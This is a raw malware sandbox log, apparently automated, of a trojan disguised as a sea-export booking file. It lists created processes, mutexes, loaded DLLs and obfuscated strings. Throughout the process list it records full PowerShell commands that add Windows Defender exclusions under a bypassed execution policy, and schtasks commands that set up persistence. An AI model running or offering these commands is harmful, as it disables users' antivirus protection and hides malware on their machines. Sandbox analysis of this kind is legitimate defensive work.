Source: 11.2.BhTdjGetAH.exe.2878b80.0.raw.unpack, AwEg9KwvdcsSNSTrrziGMrveBN1p.cs	Base64 encoded string: 'woNHpHGmMwsIKEw8ntBHKVHMhgWt0IXHmDRuldTtE1IY29APaKSBj3tt3vhKc4P7', 'SZZKT3ZI0GkfL2iAzaAIY56PUEnPP34j3knTr6UXpDeJ8PE3Nrxc04Yr9rvkIbhU'
Source: 11.2.BhTdjGetAH.exe.2878b80.0.raw.unpack, UZUv4Eo6zQhbxPiCqZPo3OnZwa02.cs	Base64 encoded string: 'GbnSte7UnD1dvquteW4lli16wRYkhufDz0HFxZAO57ZxLbKwJwhteyRiVHkz5OPplyHSYBI1pMJ2bg1bQsDscAGOdU5BXhm2', 'IQmCUlmrVabVchmitrwHYEqhjhEBPupNZBABZHHamCWHZxjZL9DtFqy5EvRllDKA62Ca72h2wxnuVK26CQ8WEaLNzlWvlJoN', 'Qz8K2Ku7fNSV9ARr09HTwaYJRaB4k09kaeFSC4oyqn3Y5oJQxVxkLk4NKjjboSa6hcqCNhwAax1i6Kxabuc26jJW9GkTpk76', 'HsBMl0O4B3Po0QfGFQt7VMpCQc8eOh3DfMLJsXpDHr3Oq1HrBTOm5mvypsZwMsrjftcH46DbCbxmlTa1lSTGEfA1zIPHxWL0', 'lby38UhbIih3cyseFESJFZIKOZLT1pSgyQscTRatCbz9fmilgpzhSacInKhkHpGjit7KCWu4AuRPNQFfwkzrfrFZEbs9m5cp', 'mTrGfa7c1ILSIYHRdRT0oxUuP2LhOEbt2JmT01hXlSSpAScubVxNgz3WA2hZ82VPjWPe8uDzGKjbI497tZP51R5BO3k4ioux', 'Jr76SJ0aVIfGTUYUDh5k8xCOn3lX5d85aGNZ8QkGWWya3z5GLeYXmXYDQTV7iqiUXeFLhwUCo4ZI5LDoPSHfXusAxbEo8old', 'lGIIkWu5VZ4lZoN9VE5L3BpNYKrQJnGl7KUraq9hD6jtevDzFNBsNaSlWSvKvIgHLchV9tP9Dx6uWpQVg035lKVTlR1DA8au', 'yc4TDGZ1oVJhiembMwlhvuInenZcFJFty5N9Vu2t9ZekWoaC9ggEfBFCI7sgQBulRyrit0Y5k10a2ya8n4QvGpQhL27F4ghL', 'xAc6fMXprV2rbR7NoiGOyVwZgFq0f8J0MbFehJ7GjR5hm8poIK5zE1X0Kqg9Eg4BMo5rX5bgyzTd5dPirUSxOMQBnQTEeGbJ', 'IR6v0s2ohF08HKGITgv7NwNzJELJhn1fEB49703FC6Oijgr95ofEcYTmUEoQWFBAo51RhVCNA90JuQlphCBn8EO4wt0aBe56'

Source: 1.2.FOR JOBREF OC-SEAEXP YFC EXPORT-SEA BOOKING853IPN0006279.exe.7ca0000.8.raw.unpack, UhRVWs4V2ZmxwggVZX.cs	Security API names: _0020.SetAccessControl
Source: 1.2.FOR JOBREF OC-SEAEXP YFC EXPORT-SEA BOOKING853IPN0006279.exe.7ca0000.8.raw.unpack, UhRVWs4V2ZmxwggVZX.cs	Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 1.2.FOR JOBREF OC-SEAEXP YFC EXPORT-SEA BOOKING853IPN0006279.exe.7ca0000.8.raw.unpack, UhRVWs4V2ZmxwggVZX.cs	Security API names: _0020.AddAccessRule
Source: 1.2.FOR JOBREF OC-SEAEXP YFC EXPORT-SEA BOOKING853IPN0006279.exe.41539e0.3.raw.unpack, UhRVWs4V2ZmxwggVZX.cs	Security API names: _0020.SetAccessControl
Source: 1.2.FOR JOBREF OC-SEAEXP YFC EXPORT-SEA BOOKING853IPN0006279.exe.41539e0.3.raw.unpack, UhRVWs4V2ZmxwggVZX.cs	Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 1.2.FOR JOBREF OC-SEAEXP YFC EXPORT-SEA BOOKING853IPN0006279.exe.41539e0.3.raw.unpack, UhRVWs4V2ZmxwggVZX.cs	Security API names: _0020.AddAccessRule
Source: 1.2.FOR JOBREF OC-SEAEXP YFC EXPORT-SEA BOOKING853IPN0006279.exe.307e1ac.1.raw.unpack, lDNrZ0PpIhtkmNhtuLhViabWwcRagB8W7OumnW1em5VOXVAZufAe0j.cs	Security API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
Source: 1.2.FOR JOBREF OC-SEAEXP YFC EXPORT-SEA BOOKING853IPN0006279.exe.307e1ac.1.raw.unpack, lDNrZ0PpIhtkmNhtuLhViabWwcRagB8W7OumnW1em5VOXVAZufAe0j.cs	Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 11.2.BhTdjGetAH.exe.288d464.1.raw.unpack, lDNrZ0PpIhtkmNhtuLhViabWwcRagB8W7OumnW1em5VOXVAZufAe0j.cs	Security API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
Source: 11.2.BhTdjGetAH.exe.288d464.1.raw.unpack, lDNrZ0PpIhtkmNhtuLhViabWwcRagB8W7OumnW1em5VOXVAZufAe0j.cs	Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 1.2.FOR JOBREF OC-SEAEXP YFC EXPORT-SEA BOOKING853IPN0006279.exe.41a9e00.4.raw.unpack, UhRVWs4V2ZmxwggVZX.cs	Security API names: _0020.SetAccessControl
Source: 1.2.FOR JOBREF OC-SEAEXP YFC EXPORT-SEA BOOKING853IPN0006279.exe.41a9e00.4.raw.unpack, UhRVWs4V2ZmxwggVZX.cs	Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 1.2.FOR JOBREF OC-SEAEXP YFC EXPORT-SEA BOOKING853IPN0006279.exe.41a9e00.4.raw.unpack, UhRVWs4V2ZmxwggVZX.cs	Security API names: _0020.AddAccessRule
Source: 1.2.FOR JOBREF OC-SEAEXP YFC EXPORT-SEA BOOKING853IPN0006279.exe.41539e0.3.raw.unpack, EJxCOd0IK9HWBTygqT.cs	Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 1.2.FOR JOBREF OC-SEAEXP YFC EXPORT-SEA BOOKING853IPN0006279.exe.3092a90.2.raw.unpack, lDNrZ0PpIhtkmNhtuLhViabWwcRagB8W7OumnW1em5VOXVAZufAe0j.cs	Security API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
Source: 1.2.FOR JOBREF OC-SEAEXP YFC EXPORT-SEA BOOKING853IPN0006279.exe.3092a90.2.raw.unpack, lDNrZ0PpIhtkmNhtuLhViabWwcRagB8W7OumnW1em5VOXVAZufAe0j.cs	Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 1.2.FOR JOBREF OC-SEAEXP YFC EXPORT-SEA BOOKING853IPN0006279.exe.7ca0000.8.raw.unpack, EJxCOd0IK9HWBTygqT.cs	Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 1.2.FOR JOBREF OC-SEAEXP YFC EXPORT-SEA BOOKING853IPN0006279.exe.41a9e00.4.raw.unpack, EJxCOd0IK9HWBTygqT.cs	Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 11.2.BhTdjGetAH.exe.2878b80.0.raw.unpack, lDNrZ0PpIhtkmNhtuLhViabWwcRagB8W7OumnW1em5VOXVAZufAe0j.cs	Security API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
Source: 11.2.BhTdjGetAH.exe.2878b80.0.raw.unpack, lDNrZ0PpIhtkmNhtuLhViabWwcRagB8W7OumnW1em5VOXVAZufAe0j.cs	Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()

Source: classification engine

Classification label: mal100.troj.evad.winEXE@44/37@4/1

Source: C:\Users\user\Desktop\FOR JOBREF OC-SEAEXP YFC EXPORT-SEA BOOKING853IPN0006279.exe

File created: C:\Users\user\AppData\Roaming\BhTdjGetAH.exe

Jump to behavior

Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7956:120:WilError_03
Source: C:\Users\user\AppData\Local\XClient.exe	Mutant created: NULL
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7740:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8016:120:WilError_03
Source: C:\Users\user\AppData\Local\XClient.exe	Mutant created: \Sessions\1\BaseNamedObjects\bseBVoWpZznFSF
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7376:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7308:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7912:120:WilError_03
Source: C:\Users\user\Desktop\FOR JOBREF OC-SEAEXP YFC EXPORT-SEA BOOKING853IPN0006279.exe	Mutant created: \Sessions\1\BaseNamedObjects\fl41tVl0YQYHBwgA
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8092:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2740:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7244:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7468:120:WilError_03

Source: C:\Users\user\Desktop\FOR JOBREF OC-SEAEXP YFC EXPORT-SEA BOOKING853IPN0006279.exe

File created: C:\Users\user\AppData\Local\Temp\tmp378C.tmp

Jump to behavior

Source: FOR JOBREF OC-SEAEXP YFC EXPORT-SEA BOOKING853IPN0006279.exe

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: FOR JOBREF OC-SEAEXP YFC EXPORT-SEA BOOKING853IPN0006279.exe

Static file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.83%

Source: C:\Users\user\Desktop\FOR JOBREF OC-SEAEXP YFC EXPORT-SEA BOOKING853IPN0006279.exe

File read: C:\Users\user\Desktop\desktop.ini

Jump to behavior

Source: C:\Users\user\Desktop\FOR JOBREF OC-SEAEXP YFC EXPORT-SEA BOOKING853IPN0006279.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: FOR JOBREF OC-SEAEXP YFC EXPORT-SEA BOOKING853IPN0006279.exe

ReversingLabs: Detection: 57%

Source: C:\Users\user\Desktop\FOR JOBREF OC-SEAEXP YFC EXPORT-SEA BOOKING853IPN0006279.exe

File read: C:\Users\user\Desktop\FOR JOBREF OC-SEAEXP YFC EXPORT-SEA BOOKING853IPN0006279.exe

Jump to behavior

Source: unknown	Process created: C:\Users\user\Desktop\FOR JOBREF OC-SEAEXP YFC EXPORT-SEA BOOKING853IPN0006279.exe "C:\Users\user\Desktop\FOR JOBREF OC-SEAEXP YFC EXPORT-SEA BOOKING853IPN0006279.exe"
Source: C:\Users\user\Desktop\FOR JOBREF OC-SEAEXP YFC EXPORT-SEA BOOKING853IPN0006279.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\FOR JOBREF OC-SEAEXP YFC EXPORT-SEA BOOKING853IPN0006279.exe"
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\FOR JOBREF OC-SEAEXP YFC EXPORT-SEA BOOKING853IPN0006279.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\BhTdjGetAH.exe"
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\FOR JOBREF OC-SEAEXP YFC EXPORT-SEA BOOKING853IPN0006279.exe	Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\BhTdjGetAH" /XML "C:\Users\user\AppData\Local\Temp\tmp378C.tmp"
Source: C:\Windows\SysWOW64\schtasks.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\FOR JOBREF OC-SEAEXP YFC EXPORT-SEA BOOKING853IPN0006279.exe	Process created: C:\Users\user\Desktop\FOR JOBREF OC-SEAEXP YFC EXPORT-SEA BOOKING853IPN0006279.exe "C:\Users\user\Desktop\FOR JOBREF OC-SEAEXP YFC EXPORT-SEA BOOKING853IPN0006279.exe"
Source: C:\Users\user\Desktop\FOR JOBREF OC-SEAEXP YFC EXPORT-SEA BOOKING853IPN0006279.exe	Process created: C:\Users\user\Desktop\FOR JOBREF OC-SEAEXP YFC EXPORT-SEA BOOKING853IPN0006279.exe "C:\Users\user\Desktop\FOR JOBREF OC-SEAEXP YFC EXPORT-SEA BOOKING853IPN0006279.exe"
Source: unknown	Process created: C:\Users\user\AppData\Roaming\BhTdjGetAH.exe C:\Users\user\AppData\Roaming\BhTdjGetAH.exe
Source: C:\Users\user\Desktop\FOR JOBREF OC-SEAEXP YFC EXPORT-SEA BOOKING853IPN0006279.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\FOR JOBREF OC-SEAEXP YFC EXPORT-SEA BOOKING853IPN0006279.exe'
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Roaming\BhTdjGetAH.exe	Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\BhTdjGetAH" /XML "C:\Users\user\AppData\Local\Temp\tmp5296.tmp"
Source: C:\Windows\SysWOW64\schtasks.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Roaming\BhTdjGetAH.exe	Process created: C:\Users\user\AppData\Roaming\BhTdjGetAH.exe "C:\Users\user\AppData\Roaming\BhTdjGetAH.exe"
Source: C:\Users\user\Desktop\FOR JOBREF OC-SEAEXP YFC EXPORT-SEA BOOKING853IPN0006279.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'FOR JOBREF OC-SEAEXP YFC EXPORT-SEA BOOKING853IPN0006279.exe'
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\FOR JOBREF OC-SEAEXP YFC EXPORT-SEA BOOKING853IPN0006279.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\XClient.exe'
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\FOR JOBREF OC-SEAEXP YFC EXPORT-SEA BOOKING853IPN0006279.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'XClient.exe'
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown	Process created: C:\Users\user\AppData\Local\XClient.exe "C:\Users\user\AppData\Local\XClient.exe"
Source: C:\Users\user\AppData\Local\XClient.exe	Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\BhTdjGetAH" /XML "C:\Users\user\AppData\Local\Temp\tmpDDBF.tmp"
Source: C:\Windows\SysWOW64\schtasks.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\XClient.exe	Process created: C:\Users\user\AppData\Local\XClient.exe "C:\Users\user\AppData\Local\XClient.exe"
Source: unknown	Process created: C:\Users\user\AppData\Local\XClient.exe "C:\Users\user\AppData\Local\XClient.exe"
Source: C:\Users\user\AppData\Local\XClient.exe	Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\BhTdjGetAH" /XML "C:\Users\user\AppData\Local\Temp\tmp125.tmp"
Source: C:\Windows\SysWOW64\schtasks.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\XClient.exe	Process created: C:\Users\user\AppData\Local\XClient.exe "C:\Users\user\AppData\Local\XClient.exe"
Source: C:\Users\user\Desktop\FOR JOBREF OC-SEAEXP YFC EXPORT-SEA BOOKING853IPN0006279.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\FOR JOBREF OC-SEAEXP YFC EXPORT-SEA BOOKING853IPN0006279.exe"	Jump to behavior
Source: C:\Users\user\Desktop\FOR JOBREF OC-SEAEXP YFC EXPORT-SEA BOOKING853IPN0006279.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\BhTdjGetAH.exe"	Jump to behavior
Source: C:\Users\user\Desktop\FOR JOBREF OC-SEAEXP YFC EXPORT-SEA BOOKING853IPN0006279.exe	Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\BhTdjGetAH" /XML "C:\Users\user\AppData\Local\Temp\tmp378C.tmp"	Jump to behavior
Source: C:\Users\user\Desktop\FOR JOBREF OC-SEAEXP YFC EXPORT-SEA BOOKING853IPN0006279.exe	Process created: C:\Users\user\Desktop\FOR JOBREF OC-SEAEXP YFC EXPORT-SEA BOOKING853IPN0006279.exe "C:\Users\user\Desktop\FOR JOBREF OC-SEAEXP YFC EXPORT-SEA BOOKING853IPN0006279.exe"	Jump to behavior
Source: C:\Users\user\Desktop\FOR JOBREF OC-SEAEXP YFC EXPORT-SEA BOOKING853IPN0006279.exe	Process created: C:\Users\user\Desktop\FOR JOBREF OC-SEAEXP YFC EXPORT-SEA BOOKING853IPN0006279.exe "C:\Users\user\Desktop\FOR JOBREF OC-SEAEXP YFC EXPORT-SEA BOOKING853IPN0006279.exe"	Jump to behavior
Source: C:\Users\user\Desktop\FOR JOBREF OC-SEAEXP YFC EXPORT-SEA BOOKING853IPN0006279.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\FOR JOBREF OC-SEAEXP YFC EXPORT-SEA BOOKING853IPN0006279.exe'	Jump to behavior
Source: C:\Users\user\Desktop\FOR JOBREF OC-SEAEXP YFC EXPORT-SEA BOOKING853IPN0006279.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'FOR JOBREF OC-SEAEXP YFC EXPORT-SEA BOOKING853IPN0006279.exe'	Jump to behavior
Source: C:\Users\user\Desktop\FOR JOBREF OC-SEAEXP YFC EXPORT-SEA BOOKING853IPN0006279.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\XClient.exe'	Jump to behavior
Source: C:\Users\user\Desktop\FOR JOBREF OC-SEAEXP YFC EXPORT-SEA BOOKING853IPN0006279.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'XClient.exe'	Jump to behavior
Source: C:\Users\user\AppData\Roaming\BhTdjGetAH.exe	Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\BhTdjGetAH" /XML "C:\Users\user\AppData\Local\Temp\tmp5296.tmp"	Jump to behavior
Source: C:\Users\user\AppData\Roaming\BhTdjGetAH.exe	Process created: C:\Users\user\AppData\Roaming\BhTdjGetAH.exe "C:\Users\user\AppData\Roaming\BhTdjGetAH.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\XClient.exe	Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\BhTdjGetAH" /XML "C:\Users\user\AppData\Local\Temp\tmpDDBF.tmp"
Source: C:\Users\user\AppData\Local\XClient.exe	Process created: C:\Users\user\AppData\Local\XClient.exe "C:\Users\user\AppData\Local\XClient.exe"
Source: C:\Users\user\AppData\Local\XClient.exe	Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\BhTdjGetAH" /XML "C:\Users\user\AppData\Local\Temp\tmp125.tmp"
Source: C:\Users\user\AppData\Local\XClient.exe	Process created: C:\Users\user\AppData\Local\XClient.exe "C:\Users\user\AppData\Local\XClient.exe"

Source: C:\Users\user\Desktop\FOR JOBREF OC-SEAEXP YFC EXPORT-SEA BOOKING853IPN0006279.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Users\user\Desktop\FOR JOBREF OC-SEAEXP YFC EXPORT-SEA BOOKING853IPN0006279.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\Desktop\FOR JOBREF OC-SEAEXP YFC EXPORT-SEA BOOKING853IPN0006279.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\FOR JOBREF OC-SEAEXP YFC EXPORT-SEA BOOKING853IPN0006279.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\Desktop\FOR JOBREF OC-SEAEXP YFC EXPORT-SEA BOOKING853IPN0006279.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\FOR JOBREF OC-SEAEXP YFC EXPORT-SEA BOOKING853IPN0006279.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\FOR JOBREF OC-SEAEXP YFC EXPORT-SEA BOOKING853IPN0006279.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\Desktop\FOR JOBREF OC-SEAEXP YFC EXPORT-SEA BOOKING853IPN0006279.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\FOR JOBREF OC-SEAEXP YFC EXPORT-SEA BOOKING853IPN0006279.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Desktop\FOR JOBREF OC-SEAEXP YFC EXPORT-SEA BOOKING853IPN0006279.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\FOR JOBREF OC-SEAEXP YFC EXPORT-SEA BOOKING853IPN0006279.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\Desktop\FOR JOBREF OC-SEAEXP YFC EXPORT-SEA BOOKING853IPN0006279.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\Desktop\FOR JOBREF OC-SEAEXP YFC EXPORT-SEA BOOKING853IPN0006279.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\Desktop\FOR JOBREF OC-SEAEXP YFC EXPORT-SEA BOOKING853IPN0006279.exe	Section loaded: dwrite.dll	Jump to behavior
Source: C:\Users\user\Desktop\FOR JOBREF OC-SEAEXP YFC EXPORT-SEA BOOKING853IPN0006279.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\FOR JOBREF OC-SEAEXP YFC EXPORT-SEA BOOKING853IPN0006279.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\Desktop\FOR JOBREF OC-SEAEXP YFC EXPORT-SEA BOOKING853IPN0006279.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\user\Desktop\FOR JOBREF OC-SEAEXP YFC EXPORT-SEA BOOKING853IPN0006279.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\FOR JOBREF OC-SEAEXP YFC EXPORT-SEA BOOKING853IPN0006279.exe	Section loaded: windowscodecs.dll	Jump to behavior
Source: C:\Users\user\Desktop\FOR JOBREF OC-SEAEXP YFC EXPORT-SEA BOOKING853IPN0006279.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Users\user\Desktop\FOR JOBREF OC-SEAEXP YFC EXPORT-SEA BOOKING853IPN0006279.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\Users\user\Desktop\FOR JOBREF OC-SEAEXP YFC EXPORT-SEA BOOKING853IPN0006279.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Users\user\Desktop\FOR JOBREF OC-SEAEXP YFC EXPORT-SEA BOOKING853IPN0006279.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Users\user\Desktop\FOR JOBREF OC-SEAEXP YFC EXPORT-SEA BOOKING853IPN0006279.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Users\user\Desktop\FOR JOBREF OC-SEAEXP YFC EXPORT-SEA BOOKING853IPN0006279.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\user\Desktop\FOR JOBREF OC-SEAEXP YFC EXPORT-SEA BOOKING853IPN0006279.exe	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\Users\user\Desktop\FOR JOBREF OC-SEAEXP YFC EXPORT-SEA BOOKING853IPN0006279.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\Desktop\FOR JOBREF OC-SEAEXP YFC EXPORT-SEA BOOKING853IPN0006279.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\Desktop\FOR JOBREF OC-SEAEXP YFC EXPORT-SEA BOOKING853IPN0006279.exe	Section loaded: appresolver.dll	Jump to behavior
Source: C:\Users\user\Desktop\FOR JOBREF OC-SEAEXP YFC EXPORT-SEA BOOKING853IPN0006279.exe	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Users\user\Desktop\FOR JOBREF OC-SEAEXP YFC EXPORT-SEA BOOKING853IPN0006279.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Users\user\Desktop\FOR JOBREF OC-SEAEXP YFC EXPORT-SEA BOOKING853IPN0006279.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Users\user\Desktop\FOR JOBREF OC-SEAEXP YFC EXPORT-SEA BOOKING853IPN0006279.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Users\user\Desktop\FOR JOBREF OC-SEAEXP YFC EXPORT-SEA BOOKING853IPN0006279.exe	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Users\user\Desktop\FOR JOBREF OC-SEAEXP YFC EXPORT-SEA BOOKING853IPN0006279.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll	Jump to behavior
